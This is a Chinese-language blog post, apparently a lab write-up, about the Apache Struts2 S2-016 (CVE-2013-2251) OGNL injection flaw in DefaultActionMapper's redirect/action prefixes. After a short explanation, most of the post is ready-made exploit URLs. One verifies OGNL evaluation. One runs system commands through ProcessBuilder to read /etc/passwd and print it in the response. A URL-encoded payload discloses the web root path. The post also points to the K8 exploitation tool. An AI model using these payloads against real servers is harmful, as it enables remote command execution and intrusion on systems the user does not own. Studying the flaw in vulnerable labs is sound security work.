在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。
漏洞记录
S2-016
CVE-2013-2251
影响版本:Struts 2.0.0 – Struts 2.3.15
http://struts.apache.org/release/2.3.x/docs/s2-016.html
影响范围非常大
漏洞检测利用
验证:
访问http://192.168.1.15:8080/index.action?redirect:OGNL表达式即可执行OGNL表达式。
http://192.168.1.15:8080/index.action?action:%25{3*4}
执行任意命令EXP
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆网站路径EXP
?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
k8工具检测利用
执行命令:
参考链接:
https://www.freebuf.com/vuls/11220.html
https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md
980
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
